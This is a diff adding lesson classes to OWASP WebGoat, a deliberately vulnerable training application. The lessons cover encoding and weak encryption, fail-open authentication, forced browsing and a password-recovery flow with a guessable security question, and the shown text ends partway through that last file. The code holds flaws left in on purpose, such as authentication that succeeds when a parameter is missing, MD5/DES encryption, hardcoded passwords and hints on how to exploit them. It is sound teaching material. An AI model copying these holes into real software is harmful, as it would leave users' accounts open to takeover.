+			s.setMessage( "Error generating " + this.getClass().getName() );
+
+			e.printStackTrace();
+
+		}
+
+		if ( getLessonTracker(  s ).getNumVisits() > 3 )
+		{
+			makeSuccess( s );
+		}
+
+		return ( ec );
+	}
+
+
+
+	/**
+	 *  Convenience method for encrypting a string.
+	 *
+	 * @param  str  Description of the Parameter
+	 * @param  pw   Description of the Parameter
+	 * @return      String the encrypted string.
+	 */
+
+	public static synchronized String decryptString( String str, String pw )
+	{
+
+		try
+		{
+
+			PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec( salt, 20 );
+
+			SecretKeyFactory kf = SecretKeyFactory.getInstance( "PBEWithMD5AndDES" );
+
+			Cipher passwordDecryptCipher = Cipher.getInstance( "PBEWithMD5AndDES/CBC/PKCS5Padding" );
+
+			char[] pass = pw.toCharArray();
+
+			SecretKey k = kf.generateSecret( new javax.crypto.spec.PBEKeySpec( pass ) );
+
+			passwordDecryptCipher.init( Cipher.DECRYPT_MODE, k, ps );
+
+			byte[] dec = decoder.decodeBuffer( str );
+
+			byte[] utf8 = passwordDecryptCipher.doFinal( dec );
+
+			return new String( utf8, "UTF-8" );
+		}
+
+		catch ( Exception e )
+		{
+
+			return ( "This is not an encrypted string" );
+		}
+
+	}
+
+
+
+	/**
+	 *  Convenience method for encrypting a string.
+	 *
+	 * @param  str                    Description of the Parameter
+	 * @param  pw                     Description of the Parameter
+	 * @return                        String the encrypted string.
+	 * @exception  SecurityException  Description of the Exception
+	 */
+
+	public static synchronized String encryptString( String str, String pw ) throws SecurityException
+	{
+
+		try
+		{
+
+			PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec( salt, 20 );
+
+			SecretKeyFactory kf = SecretKeyFactory.getInstance( "PBEWithMD5AndDES" );
+
+			Cipher passwordEncryptCipher = Cipher.getInstance( "PBEWithMD5AndDES/CBC/PKCS5Padding" );
+
+			char[] pass = pw.toCharArray();
+
+			SecretKey k = kf.generateSecret( new javax.crypto.spec.PBEKeySpec( pass ) );
+
+			passwordEncryptCipher.init( Cipher.ENCRYPT_MODE, k, ps );
+
+			byte[] utf8 = str.getBytes( "UTF-8" );
+
+			byte[] enc = passwordEncryptCipher.doFinal( utf8 );
+
+			return encoder.encode( enc );
+		}
+
+		catch ( Exception e )
+		{
+
+			return ( "Encryption error" );
+		}
+
+	}
+
+
+
+	/**
+	 *  Gets the category attribute of the Encoding object
+	 *
+	 * @return    The category value
+	 */
+
+	protected Category getDefaultCategory()
+	{
+		return Category.INSECURE_STORAGE;
+	}
+
+
+	/**
+	 *  Gets the hints attribute of the HelloScreen object
+	 *
+	 * @return    The hints value
+	 */
+
+	public List<String> getHints(WebSession s)
+	{
+
+		List<String> hints = new ArrayList<String>();
+		hints.add( "Enter a string and press 'go'" );
+		hints.add( "Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters )." );
+		hints.add( "Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' )." );
+		return hints;
+	}
+
+
+
+	/**
+	 *  Gets the instructions attribute of the Encoding object
+	 *
+	 * @return    The instructions value
+	 */
+
+	public String getInstructions(WebSession s)
+	{
+		return "This lesson will familiarize the user with different encoding schemes.  ";
+	}
+
+
+
+
+
+	private final static Integer DEFAULT_RANKING = new Integer(15);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 *  Gets the title attribute of the HelloScreen object
+	 *
+	 * @return    The title value
+	 */
+
+	public String getTitle()
+	{
+		return ( "Encoding Basics" );
+	}
+
+
+
+	/**
+	 *  Returns the MD5 hash of a String.
+	 *
+	 * @param  str  Description of the Parameter
+	 * @return      Description of the Return Value
+	 */
+
+	public static String hashMD5( String str )
+	{
+
+		byte[] b = str.getBytes();
+		MessageDigest md = null;
+
+		try
+		{
+			md = MessageDigest.getInstance( "MD5" );
+			md.update( b );
+		}
+		catch ( NoSuchAlgorithmException e )
+		{
+			// it's got to be there
+			e.printStackTrace();
+		}
+		return ( base64Encode( md.digest() ) );
+	}
+
+
+
+	/**
+	 *  Returns the SHA hash of a String.
+	 *
+	 * @param  str  Description of the Parameter
+	 * @return      Description of the Return Value
+	 */
+
+	public static String hashSHA( String str )
+	{
+		byte[] b = str.getBytes();
+		MessageDigest md = null;
+		try
+		{
+			md = MessageDigest.getInstance( "SHA-256" );
+			md.update( b );
+		}
+		catch ( NoSuchAlgorithmException e )
+		{
+			// it's got to be there
+			e.printStackTrace();
+		}
+		return ( base64Encode( md.digest() ) );
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  hexString  Description of the Parameter
+	 * @return            Description of the Return Value
+	 */
+
+	public static String hexDecode( String hexString )
+	{
+		try
+		{
+			if ( ( hexString.length() % 3 ) != 0 )
+			{
+				return ( "String not comprised of Hex digit pairs." );
+			}
+			char[] chars = new char[hexString.length()];
+			char[] convChars = new char[hexString.length() / 3];
+			hexString.getChars( 0, hexString.length(), chars, 0 );
+			for ( int i = 1; i < hexString.length(); i += 3 )
+			{
+				String hexToken = new String( chars, i, 2 );
+				convChars[i / 3] = (char) Integer.parseInt( hexToken, 16 );
+			}
+			return new String( convChars );
+		}
+		catch ( NumberFormatException nfe )
+		{
+			return ( "String not comprised of Hex digits" );
+		}
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  asciiString  Description of the Parameter
+	 * @return              Description of the Return Value
+	 */
+
+	public static String hexEncode( String asciiString )
+	{
+		char[] ascii = new char[asciiString.length()];
+		asciiString.getChars( 0, asciiString.length(), ascii, 0 );
+		StringBuffer hexBuff = new StringBuffer();
+		for ( int i = 0; i < asciiString.length(); i++ )
+		{
+			hexBuff.append( "%" );
+			hexBuff.append( Integer.toHexString( ascii[i] ) );
+		}
+		return hexBuff.toString().toUpperCase();
+	}
+
+
+
+	/**
+	 *  The main program for the Encoding class
+	 *
+	 * @param  args  The command line arguments
+	 */
+
+	public static void main( String[] args )
+	{
+		try
+		{
+			String userInput = args[0];
+			String userKey = args[1];
+			System.out.println( "Working with: " + userInput );
+			System.out.print( "Base64 encoding: " );
+			System.out.println( base64Encode( userInput ) + " : " + base64Decode( userInput ) );
+			System.out.print( "Entity encoding: " );
+			System.out.println( HtmlEncoder.encode( userInput ) + " : " + HtmlEncoder.decode( userInput ) );
+			System.out.print( "Password based encryption (PBE): " );
+			System.out.println( encryptString( userInput, userKey ) + " : " + decryptString( userInput, userKey ) );
+			System.out.print( "MD5 hash: " );
+			System.out.println( hashMD5( userInput ) + " : " + "Cannot reverse a hash" );
+			System.out.print( "SHA-256 hash: " );
+			System.out.println( hashSHA( userInput ) + " : " + "Cannot reverse a hash" );
+			System.out.print( "Unicode encoding: " );
+			System.out.println( "Not Implemented" + " : " + "Not Implemented" );
+			System.out.print( "URL encoding: " );
+			System.out.println( urlEncode( userInput ) + " : " + urlDecode( userInput ) );
+			System.out.print( "Hex encoding: " );
+			System.out.println( hexEncode( userInput ) + " : " + hexDecode( userInput ) );
+			System.out.print( "Rot13 encoding: " );
+			System.out.println( rot13( userInput ) + " : " + rot13( userInput ) );
+			System.out.print( "XOR with password: " );
+			System.out.println( xorEncode( userInput, userKey ) + " : " + xorDecode( userInput, userKey ) );
+			System.out.print( "Double unicode encoding is..." );
+			System.out.println( "Not Implemented" + " : " + "Not Implemented" );
+			System.out.print( "Double URL encoding: " );
+			System.out.println( urlEncode( urlEncode( userInput ) ) + " : " + urlDecode( urlDecode( userInput ) ) );
+		}
+		catch ( Exception e )
+		{
+			e.printStackTrace();
+		}
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  value1       Description of the Parameter
+	 * @param  value2       Description of the Parameter
+	 * @param  description  Description of the Parameter
+	 * @return              Description of the Return Value
+	 */
+
+	private TR makeRow( String description, String value1, String value2 )
+	{
+
+		TD desc = new TD().addElement( description ).setBgColor( "#bbbbbb" );
+		TD val1 = new TD().addElement( value1 ).setBgColor( "#dddddd" );
+		TD val2 = new TD().addElement( value2 ).setBgColor( "#dddddd" );
+		TR tr = new TR();
+
+		tr.addElement( desc );
+		tr.addElement( val1 );
+		tr.addElement( val2 );
+
+		return tr;
+	}
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  value1       Description of the Parameter
+	 * @param  value2       Description of the Parameter
+	 * @param  description  Description of the Parameter
+	 * @return              Description of the Return Value
+	 */
+
+	private TR makeTitleRow( String description, String value1, String value2 )
+	{
+		TD desc = new TD().addElement( new B().addElement( description ) );
+		TD val1 = new TD().addElement( new B().addElement( value1 ) );
+		TD val2 = new TD().addElement( new B().addElement( value2 ) );
+		desc.setAlign( "center" );
+		val1.setAlign( "center" );
+		val2.setAlign( "center" );
+		TR tr = new TR();
+		tr.addElement( desc );
+		tr.addElement( val1 );
+		tr.addElement( val2 );
+		return ( tr );
+	}
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  input  Description of the Parameter
+	 * @return        Description of the Return Value
+	 */
+
+	public static synchronized String rot13( String input )
+	{
+		StringBuffer output = new StringBuffer();
+		if ( input != null )
+		{
+			for ( int i = 0; i < input.length(); i++ )
+			{
+				char inChar = input.charAt( i );
+				if ( ( inChar >= 'A' ) & ( inChar <= 'Z' ) )
+				{
+					inChar += 13;
+					if ( inChar > 'Z' )
+					{
+						inChar -= 26;
+					}
+				}
+				if ( ( inChar >= 'a' ) & ( inChar <= 'z' ) )
+				{
+					inChar += 13;
+					if ( inChar > 'z' )
+					{
+						inChar -= 26;
+					}
+				}
+				output.append( inChar );
+			}
+		}
+		return output.toString();
+	}
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  str  Description of the Parameter
+	 * @return      Description of the Return Value
+	 */
+
+	public static String unicodeDecode( String str )
+	{
+		// FIXME: TOTALLY EXPERIMENTAL
+
+		try
+		{
+			ByteBuffer bbuf = ByteBuffer.allocate( str.length() );
+			bbuf.put( str.getBytes() );
+			Charset charset = Charset.forName( "ISO-8859-1" );
+			CharsetDecoder decoder = charset.newDecoder();
+			CharBuffer cbuf = decoder.decode( bbuf );
+			return ( cbuf.toString() );
+		}
+		catch ( Exception e )
+		{
+			return ( "Encoding problem" );
+		}
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  str  Description of the Parameter
+	 * @return      Description of the Return Value
+	 */
+
+	public static String unicodeEncode( String str )
+	{
+		// FIXME: TOTALLY EXPERIMENTAL
+		try
+		{
+			Charset charset = Charset.forName( "ISO-8859-1" );
+			CharsetEncoder encoder = charset.newEncoder();
+			ByteBuffer bbuf = encoder.encode( CharBuffer.wrap( str ) );
+			return ( new String( bbuf.array() ) );
+		}
+		catch ( Exception e )
+		{
+			return ( "Encoding problem" );
+		}
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  str  Description of the Parameter
+	 * @return      Description of the Return Value
+	 */
+
+	public static String urlDecode( String str )
+	{
+		try
+		{
+			return ( URLDecoder.decode( str, "UTF-8" ) );
+		}
+		catch ( Exception e )
+		{
+			return ( "Decoding error" );
+		}
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  str  Description of the Parameter
+	 * @return      Description of the Return Value
+	 */
+
+	public static String urlEncode( String str )
+	{
+		try
+		{
+			return ( URLEncoder.encode( str, "UTF-8" ) );
+		}
+		catch ( Exception e )
+		{
+			return ( "Encoding error" );
+		}
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  input    Description of the Parameter
+	 * @param  userKey  Description of the Parameter
+	 * @return          Description of the Return Value
+	 */
+
+	public static synchronized char[] xor( String input, String userKey )
+	{
+		if ( ( userKey == null ) || ( userKey.trim().length() == 0 ) )
+		{
+			userKey = "Goober";
+		}
+		char[] xorChars = userKey.toCharArray();
+		int keyLen = xorChars.length;
+		char[] inputChars = null;
+		char[] outputChars = null;
+		if ( input != null )
+		{
+			inputChars = input.toCharArray();
+			outputChars = new char[inputChars.length];
+			for ( int i = 0; i < inputChars.length; i++ )
+			{
+				outputChars[i] = (char) ( inputChars[i] ^ xorChars[i % keyLen] );
+			}
+		}
+		return outputChars;
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  input    Description of the Parameter
+	 * @param  userKey  Description of the Parameter
+	 * @return          Description of the Return Value
+	 */
+
+	public static synchronized String xorDecode( String input, String userKey )
+	{
+		try
+		{
+			String decoded = base64Decode( input );
+			return new String( xor( decoded, userKey ) );
+		}
+		catch ( Exception e )
+		{
+			return "String not XOR encoded.";
+		}
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  input    Description of the Parameter
+	 * @param  userKey  Description of the Parameter
+	 * @return          Description of the Return Value
+	 */
+
+	public static synchronized String xorEncode( String input, String userKey )
+	{
+		return base64Encode( xor( input, userKey ) );
+	}
+
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java b/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java
new file mode 100644
index 000000000..d3d703804
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java
@@ -0,0 +1,193 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.IMG;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class FailOpenAuthentication extends WeakAuthenticationCookie
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	boolean logout = s.getParser().getBooleanParameter(LOGOUT, false);
+
+	if (logout)
+	{
+	    s.setMessage("Goodbye!");
+	    s.eatCookies();
+
+	    return (makeLogin(s));
+	}
+
+	try
+	{
+	    String username = "";
+	    String password = "";
+
+	    try
+	    {
+		username = s.getParser().getRawParameter(USERNAME);
+		password = s.getParser().getRawParameter(PASSWORD);
+
+		// if credentials are bad, send the login page
+		if (!"webgoat".equals(username) || !password.equals("webgoat"))
+		{
+		    s.setMessage("Invalid username and password entered.");
+
+		    return (makeLogin(s));
+		}
+	    }
+	    catch (Exception e)
+	    {
+		// The parameter was omitted. set fail open status complete
+		if (username.length() > 0
+			&& e.getMessage().indexOf("not found") != -1)
+		{
+		    if ((username != null) && (username.length() > 0))
+		    {
+			makeSuccess(s);
+			return (makeUser(s, username,
+				"Fail Open Error Handling"));
+		    }
+		}
+	    }
+
+	    // Don't let the fail open pass with a blank password.
+	    if (password.length() == 0)
+	    {
+		// We make sure the username was submitted to avoid telling the user an invalid
+		// username/password was entered when they first enter the lesson via the side menu.
+		// This also suppresses the error if they just hit the login and both fields are empty.
+		if (username.length() != 0)
+		{
+		    s.setMessage("Invalid username and password entered.");
+		}
+
+		return (makeLogin(s));
+
+	    }
+
+	    // otherwise authentication is good, show the content
+	    if ((username != null) && (username.length() > 0))
+	    {
+		return (makeUser(s, username,
+			"Parameters.  You did not exploit the fail open."));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	}
+
+	return (makeLogin(s));
+    }
+
+
+    /**
+     *  Gets the category attribute of the FailOpenAuthentication object
+     *
+     * @return    The category value
+     */
+    public Category getDefaultCategory()
+    {
+	return Category.ERROR_HANDLING;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the AuthenticateScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("You can force errors during the authentication process.");
+	hints
+		.add("You can change length, existance, or values of authentication parameters.");
+	hints
+		.add("Try removing a parameter ENTIRELY with <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A>.");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the FailOpenAuthentication object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate "
+		+ "as the 'webgoat' user without entering a password.  Try to login as the webgoat user without "
+		+ "specifying a password.";
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(20);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the AuthenticateScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Fail Open Authentication Scheme");
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java
new file mode 100644
index 000000000..c457b097b
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java
@@ -0,0 +1,153 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created    November 02, 2006
+ */
+public class ForcedBrowsing extends LessonAdapter
+{
+
+    private final static String SUCCEEDED = "succeeded";
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+		String success = new String(s.getParser().getStringParameter(SUCCEEDED,""));
+		
+		if (success.length() != 0 && success.equals("yes"))
+		{
+		    ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page")));
+		    ec.addElement(new BR());
+		    Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
+		
+		    TR tr = new TR();
+		    tr.addElement(new TD(new StringElement("Set Admin Privileges for: ")));
+		
+		    Input input1 = new Input(Input.TEXT, "", "");
+		    tr.addElement(new TD(input1));
+		    t1.addElement(tr);
+		
+		    tr = new TR();
+		    tr.addElement(new TD(new StringElement("Set Admin Password:")));
+		
+		    input1 = new Input(Input.PASSWORD, "", "");
+		    tr.addElement(new TD(input1));
+		    t1.addElement(tr);
+		
+		    Element b = ECSFactory.makeButton("Submit");
+		    t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right")));
+		    ec.addElement(t1);
+		
+		    makeSuccess(s);
+		}
+		else
+		{
+		    ec.addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel.");
+		}
+		return ec;
+    }
+
+
+    /**
+     *  Gets the category attribute of the ForgotPassword object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+    	return Category.INSECURE_CONFIGURATION;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the HelloScreen object
+     *
+     * @return    The hints value
+     */
+    public List<String> getHints(WebSession s)
+    {
+    	List<String> hints = new ArrayList<String>();
+		hints.add("Try to guess the URL for the config page");
+		hints.add("The config page is guessable and hackable");
+		hints.add("Play with the URL and try to guess what you can replace 'attack' with.");
+		hints.add("Try to navigate to http://localhost/WebGoat/conf");
+		return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(15);
+
+
+    protected Integer getDefaultRanking()
+    {
+    	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+    	return ("Forced Browsing");
+    }
+
+
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java
new file mode 100644
index 000000000..6d2bee5ca
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java
@@ -0,0 +1,338 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.HashMap;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Eric Sheridan <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    December 18, 2005
+ */
+public class ForgotPassword extends LessonAdapter
+{
+
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+
+    private final static String USERNAME = "Username";
+
+    private static String USERNAME_RESPONSE = "";
+
+    private final static String COLOR = "Color";
+
+    private static String COLOR_RESPONSE = "";
+
+    private static int STAGE = 1;
+
+    private final static HashMap<String, String> USERS = new HashMap<String, String>();
+
+    private final static HashMap<String, String> COLORS = new HashMap<String, String>();
+
+
+    private void populateTables()
+    {
+		USERS.put("admin", "2275$starBo0rn3");
+		USERS.put("jeff", "(_I_)illia(V)s");
+		USERS.put("dave", "\\V/ich3r$");
+		USERS.put("intern", "H3yn0w");
+		USERS.put("webgoat", "webgoat");
+	
+		COLORS.put("admin", "green");
+		COLORS.put("jeff", "orange");
+		COLORS.put("dave", "purple");
+		COLORS.put("intern", "yellow");
+		COLORS.put("webgoat", "red");
+    }
+
+
+    protected Element doStage1(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+	
+		ec.addElement(new BR().addElement(new H1().addElement("Webgoat Password Recovery ")));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+	
+		if (s.isColor())
+		{
+		    t.setBorder(1);
+		}
+	
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("Please input your username.  See the OWASP admin if you do not have an account.").setColSpan(2).setAlign("left"));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+	
+		TR row1 = new TR();
+		row1.addElement(new TD(new B(new StringElement("*User Name: "))));
+	
+		Input input1 = new Input(Input.TEXT, USERNAME, "");
+		row1.addElement(new TD(input1));
+		t.addElement(row1);
+	
+		Element b = ECSFactory.makeButton("Submit");
+		t.addElement(new TR(new TD(b)));
+		ec.addElement(t);
+	
+		return (ec);
+    }
+
+
+    protected Element doStage2(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+	
+		ec.addElement(new H1().addElement("Webgoat Password Recovery "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+	
+		if (s.isColor())
+		{
+		    t.setBorder(1);
+		}
+	
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("Secret Question: What is your favorite color?").setColSpan(2).setAlign("left"));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+	
+		TR row1 = new TR();
+		row1.addElement(new TD(new B(new StringElement("*Answer: "))));
+	
+		Input input1 = new Input(Input.TEXT, COLOR, "");
+		row1.addElement(new TD(input1));
+		t.addElement(row1);
+	
+		Element b = ECSFactory.makeButton("Submit");
+		t.addElement(new TR(new TD(b)));
+		ec.addElement(t);
+	
+		return (ec);
+    }
+
+
+    protected Element doStage3(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+	
+		ec.addElement(new H1().addElement("Webgoat Password Recovery "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+	
+		if (s.isColor())
+		{
+		    t.setBorder(1);
+		}
+	
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("For security reasons, please change your password immediately.").setColSpan(2).setAlign("left"));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:")))).setAlign("left"));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement(new StringElement("Username: " + USERNAME_RESPONSE)));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement(new StringElement("Color: " + COLOR_RESPONSE)));
+		t.addElement(tr);
+	
+		tr = new TR();
+		tr.addElement(new TD().addElement(new StringElement("Password: " + USERS.get(USERNAME_RESPONSE).toString())));
+		t.addElement(tr);
+	
+		ec.addElement(t);
+	
+		if (USERNAME_RESPONSE.equals("admin") && COLOR_RESPONSE.equals("green"))
+		{
+		    makeSuccess(s);
+		}
+		else if (!USERNAME_RESPONSE.equals("webgoat") && USERS.containsKey(USERNAME_RESPONSE))
+		{
+		    s.setMessage("Close. Now try to get the password of a privileged account.");
+		}
+		return ec;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+		String username = "";
+		String color = "";
+	
+		color = s.getParser().getStringParameter(COLOR, "");
+	
+		if (color.length() > 0)
+		    STAGE = 2;
+		else
+		    STAGE = 1;
+	
+		if (USERS.size() == 0)
+		{
+		    populateTables();
+		}
+	
+		if (STAGE == 2)
+		{
+		    color = s.getParser().getStringParameter(COLOR, "");
+	
+		    if (COLORS.get(USERNAME_RESPONSE).equals(color))
+		    {
+				STAGE = 1;
+				COLOR_RESPONSE = color;
+				ec.addElement(doStage3(s));
+		    }
+		    else
+		    {
